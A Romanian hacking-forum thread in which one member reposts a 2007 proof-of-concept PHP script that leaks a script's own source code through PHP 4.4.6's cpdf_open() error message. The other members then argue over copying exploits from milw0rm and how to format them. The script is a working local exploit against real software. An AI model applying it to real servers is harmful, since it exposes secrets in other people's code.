Filehost.ro - gazduire fisiere
Hacking and more...
HaCkinG CulT
Nou pe simpatie:
mariana_n23 pe Simpatie
Femeie
24 ani
Brasov
cauta Barbat
29 - 52 ani
Hacking and more...ReguliInregistrareLoginPozeNu sunteti logat. Lista Forumurilor Pe Tematici
Hacking and more... / Exploituri si POCs /

PHP 4.4.6 cpdf_open() Local Source Code Discslosure PoC

Pagini: 1 Moderat de Shocker
#1
Zero_Cool
Pe lista neagra
Postari: 796
<?php
   /*
   PHP 4.4.6 cpdf_open() source code disclosure poc
   by rgod
   site: http://retrogod.altervista.org

   to be launched from the cli

   this will show as output something like this:

   ClibPDF: Cannot open [A * 11111]$my_password_is="suntzu";[newline]
   $my_password_is="suntzu";[etc...] for PDF output
   X-Powered-By: PHP/4.4.6
   Content-type: text/html

   I don't see some echo, and you? :)
   */

   if (!extension_loaded("cpdf")){
       die("you need the cpdf extension loaded.");
   }
   $____buff=str_repeat('A',1111);

   $p=cpdf_open(1,$____buff);

   //some code with some information
   $my_password_is="suntzu";
   $my_password_is="suntzu";
   $my_password_is="suntzu";
   $my_password_is="suntzu";
   $my_password_is="suntzu";
   $my_password_is="suntzu";
   $my_password_is="suntzu";
   $my_password_is="suntzu";
   $my_password_is="suntzu";
   $my_password_is="suntzu";
   $my_password_is="suntzu";
   $my_password_is="suntzu";
   $my_password_is="suntzu";
   $my_password_is="suntzu";
   $my_password_is="suntzu";
   $my_password_is="suntzu";
   $my_password_is="suntzu";
   $my_password_is="suntzu";
   $my_password_is="suntzu";
   $my_password_is="suntzu";
   $my_password_is="suntzu";
   $my_password_is="suntzu";
   $my_password_is="suntzu";
   $my_password_is="suntzu";
   $my_password_is="suntzu";
   $my_password_is="suntzu";
   $my_password_is="suntzu";
   $my_password_is="suntzu";
   $my_password_is="suntzu";
   $my_password_is="suntzu";
   $my_password_is="suntzu";
   $my_password_is="suntzu";
   $my_password_is="suntzu";
   $my_password_is="suntzu";
   $my_password_is="suntzu";
   $my_password_is="suntzu";
   $my_password_is="suntzu";
   $my_password_is="suntzu";
   $my_password_is="suntzu";
   $my_password_is="suntzu";
   $my_password_is="suntzu";
   $my_password_is="suntzu";
   $my_password_is="suntzu";
   $my_password_is="suntzu";
   $my_password_is="suntzu";
   $my_password_is="suntzu";
   $my_password_is="suntzu";
   $my_password_is="suntzu";
   $my_password_is="suntzu";
   $my_password_is="suntzu";
   $my_password_is="suntzu";
   $my_password_is="suntzu";
   $my_password_is="suntzu";
   $my_password_is="suntzu";
   $my_password_is="suntzu";
   $my_password_is="suntzu";

?>

# milw0rm.com [2007-03-09]


 
   
#2
snark
Grand Master
Postari: 207
l-ati facut moderator doar pentru ca a copiat niste exploituri de acolo aici ???   

_______________________________________




 
   
#3
Zero_Cool
Pe lista neagra
Postari: 796
suna a mesaj de invidie 

si ce sa punem la exploituri atunci ? eu vreau sa ajut forumu


 
   
#4
snark
Grand Master
Postari: 207
fie..
oricum cred ca nici tu nu folosesti exploiturile alea..
btw nu este mesaj de invidie


_______________________________________




 
   
#5
rimagheo
Elite Member
Postari: 950
Zero_Cool...dezactiveaza smiles cand postezi exploituri, ca iese ca naiba.

_______________________________________
Cum sa pui intrebari pe forum - multi au nevoie de acest ghid

 
   
#6
Zero_Cool
Pe lista neagra
Postari: 796
mai uit cateodata, si sa modific nu pot din cauza la 3x
poti sa dai 'Citati' :P si vezi totu clar


 
   
#7
DarkTempo
Elite Member
Postari: 556
sau pune intre [ code] si [ /code] scapi de batai de cap
P.S. felicitari pentru titlu


_______________________________________
admin edit: poza mai mare de 300 x 100 pixeli

 
   
#8
OSHO
Elite Member
Din: Cluj
Postari: 2069

Zero_Cool a scris:

si ce sa punem la exploituri atunci ?

In sectiunea asta ar trebui sa vina doar cei care au nevoie de exploituri, cei care au facut un exploit sau cei care vor sa demonstreze functionalitatea unui exploit. Daca postezi toate exploiturile care le gasesti nu ajuti pe nimeni ci doar securajezi lumea sa posteze aici ceea ce ar trebui sa posteze


_______________________________________

IPFind: IP Finder and browser revealer
SkullBox: IT pentru incepatori
_______________________________________

 
   
#9
snark
Grand Master
Postari: 207
vezi bai cool ce zice osho ? 

_______________________________________




 
   
#10
Zero_Cool
Pe lista neagra
Postari: 796

OSHO a scris:


Zero_Cool a scris:

si ce sa punem la exploituri atunci ?

In sectiunea asta ar trebui sa vina doar cei care au nevoie de exploituri, cei care au facut un exploit sau cei care vor sa demonstreze functionalitatea unui exploit. Daca postezi toate exploiturile care le gasesti nu ajuti pe nimeni ci doar securajezi lumea sa posteze aici ceea ce ar trebui sa posteze



ok got it, dar sectiunea e goala nimeni nu cere exploituri, nimeni nu pune exploituri


 
   
#11
OSHO
Elite Member
Din: Cluj
Postari: 2069

Zero_Cool a scris:

ok got it, dar sectiunea e goala nimeni nu cere exploituri, nimeni nu pune exploituri

Asta pentru ca majoritatea sunt incepatori. Canalizeaza-ti energia pe celelalte sectiuni si ajuta-i pe incepatori sa creasca si pe "smecherasi" sa caute alt forum. Cand ajung incepatorii sa se simta cat de cat pe picioarele lor vor incepe sa caute sau sa faca exploituri.


_______________________________________

IPFind: IP Finder and browser revealer
SkullBox: IT pentru incepatori
_______________________________________

 
   
#12
tw8
Elite Member
Din: Drobeta Turnu Severin
Postari: 1087
@snark: u de ce vorbesti k si tu ai pus vreo 3 exploit'uri....si sa stii k si daca te-ar face moderator nu ai fi in stare sa stapanesti utilizatorii si sa ii impaci pe cei ce se cearta(parerea mea)

_______________________________________



 
   
Pagini: 1  
Mergi la